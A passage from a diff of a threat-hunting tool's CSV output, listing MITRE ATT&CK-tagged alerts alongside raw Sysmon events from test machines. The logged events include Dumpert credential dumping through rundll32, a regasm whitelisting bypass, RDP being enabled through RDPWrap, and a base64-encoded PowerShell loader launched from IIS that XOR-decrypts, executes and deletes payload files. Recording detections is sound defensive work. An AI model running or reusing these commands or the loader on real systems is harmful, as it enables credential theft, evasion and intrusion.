cABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe  .\Outflank-Dumpert-DLL.dll, Dump)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-21T07:35:50.128026Z"">
+    </TimeCreated>
+    <EventRecordID>238378</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1560"" ThreadID=""2316"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>alice.insecurebank.local</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-21 07:35:50.093</Data>
+    <Data Name=""ProcessGuid"">ECAD0485-88D6-5D0C-0000-001007AA1D00</Data>
+    <Data Name=""ProcessId"">1568</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.3.9600.17415 (winblue_r4.141028-1500)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32.exe  .\Outflank-Dumpert-DLL.dll, Dump</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\administrator\Desktop\x64\</Data>
+    <Data Name=""User"">insecurebank\Administrator</Data>
+    <Data Name=""LogonGuid"">ECAD0485-87E3-5D0C-0000-0020266A0F00</Data>
+    <Data Name=""LogonId"">0xf6a26</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C</Data>
+    <Data Name=""ParentProcessGuid"">ECAD0485-8897-5D0C-0000-0010A2FA1C00</Data>
+    <Data Name=""ParentProcessId"">3964</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  .\Outflank-Dumpert-DLL.dll, Dump )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-21T07:35:50.128026Z"">
+    </TimeCreated>
+    <EventRecordID>238378</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1560"" ThreadID=""2316"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>alice.insecurebank.local</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-21 07:35:50.093</Data>
+    <Data Name=""ProcessGuid"">ECAD0485-88D6-5D0C-0000-001007AA1D00</Data>
+    <Data Name=""ProcessId"">1568</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.3.9600.17415 (winblue_r4.141028-1500)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32.exe  .\Outflank-Dumpert-DLL.dll, Dump</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\administrator\Desktop\x64\</Data>
+    <Data Name=""User"">insecurebank\Administrator</Data>
+    <Data Name=""LogonGuid"">ECAD0485-87E3-5D0C-0000-0020266A0F00</Data>
+    <Data Name=""LogonId"">0xf6a26</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C</Data>
+    <Data Name=""ParentProcessGuid"">ECAD0485-8897-5D0C-0000-0010A2FA1C00</Data>
+    <Data Name=""ParentProcessId"">3964</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  .\Outflank-Dumpert-DLL.dll, Dump )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-21T07:35:50.128026Z"">
+    </TimeCreated>
+    <EventRecordID>238378</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1560"" ThreadID=""2316"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>alice.insecurebank.local</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-21 07:35:50.093</Data>
+    <Data Name=""ProcessGuid"">ECAD0485-88D6-5D0C-0000-001007AA1D00</Data>
+    <Data Name=""ProcessId"">1568</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.3.9600.17415 (winblue_r4.141028-1500)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32.exe  .\Outflank-Dumpert-DLL.dll, Dump</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\administrator\Desktop\x64\</Data>
+    <Data Name=""User"">insecurebank\Administrator</Data>
+    <Data Name=""LogonGuid"">ECAD0485-87E3-5D0C-0000-0020266A0F00</Data>
+    <Data Name=""LogonId"">0xf6a26</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C</Data>
+    <Data Name=""ParentProcessGuid"">ECAD0485-8897-5D0C-0000-0010A2FA1C00</Data>
+    <Data Name=""ParentProcessId"">3964</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1567169648.171875,2019-08-30T16:54:08.171875+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript  c:\ProgramData\memdump.vbs notepad.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\System32\cmd.exe) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-30T12:54:07.873789Z"">
+    </TimeCreated>
+    <EventRecordID>32151</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3292"" ThreadID=""928"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-30 12:54:07.823</Data>
+    <Data Name=""ProcessGuid"">747F3D96-1C6F-5D69-0000-0010323C1F00</Data>
+    <Data Name=""ProcessId"">2576</Data>
+    <Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""FileVersion"">5.812.10240.16384</Data>
+    <Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cscript  c:\ProgramData\memdump.vbs notepad.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
+    <Data Name=""LogonId"">0xe81e5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-1B6C-5D69-0000-00106F060F00</Data>
+    <Data Name=""ParentProcessId"">2128</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\System32\cmd.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436014.411034,2019-07-30T01:33:34.411034+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:34.295068Z"">
+    </TimeCreated>
+    <EventRecordID>4922</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:34.216</Data>
+    <Data Name=""ProcessGuid"">747F3D96-662E-5D3F-0000-001011038900</Data>
+    <Data Name=""ProcessId"">6020</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556380674.165738,2019-04-27T19:57:54.165738+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c del /q &quot;C:\Users\IEUser\Downloads\Flash_update.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T15:57:54.134488Z"">
+    </TimeCreated>
+    <EventRecordID>6622</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1912"" ThreadID=""996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1059,technique_name=Command-Line Interface</Data>
+    <Data Name=""UtcTime"">2019-04-27 15:57:54.087</Data>
+    <Data Name=""ProcessGuid"">365ABB72-7C02-5CC4-0000-0010FD6E0C00</Data>
+    <Data Name=""ProcessId"">3188</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c del /q &quot;C:\Users\IEUser\Downloads\Flash_update.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-7AB1-5CC4-0000-0020BEF40000</Data>
+    <Data Name=""LogonId"">0xf4be</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-7C01-5CC4-0000-00102B3E0C00</Data>
+    <Data Name=""ParentProcessId"">2680</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Downloads\Flash_update.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Downloads\Flash_update.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,1552853889.282593,2019-03-18T00:18:09.282593+04:00,,Threat,High,[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,13,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>13</EventID>
+    <Version>2</Version>
+    <Level>4</Level>
+    <Task>13</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-17T20:18:09.282593Z"">
+    </TimeCreated>
+    <EventRecordID>5267</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1852"" ThreadID=""464"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC04.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""EventType"">SetValue</Data>
+    <Data Name=""UtcTime"">2019-03-17 20:18:09.272</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AB70-5C8E-0000-0010DF1F0A00</Data>
+    <Data Name=""ProcessId"">3700</Data>
+    <Data Name=""Image"">C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe</Data>
+    <Data Name=""TargetObject"">HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections</Data>
+    <Data Name=""Details"">DWORD (0x00000000)</Data>
+  </EventData>
+</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,"Found User (IIS APPPOOL\DefaultAppPool) run Suspicious PowerShell commands that include ( -enc , -noni ,-noni,-nop,powershell,\Windows\System32,ls, -t , -w ) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==) and Parent Image :C:\Windows\System32\inetsrv\w3wp.exe , Parent CommandLine (c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20) in directory : ( C:\Windows\Temp\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:28:42.711005Z"">
+    </TimeCreated>
+    <EventRecordID>5875</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:28:42.700</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ProcessId"">2584</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
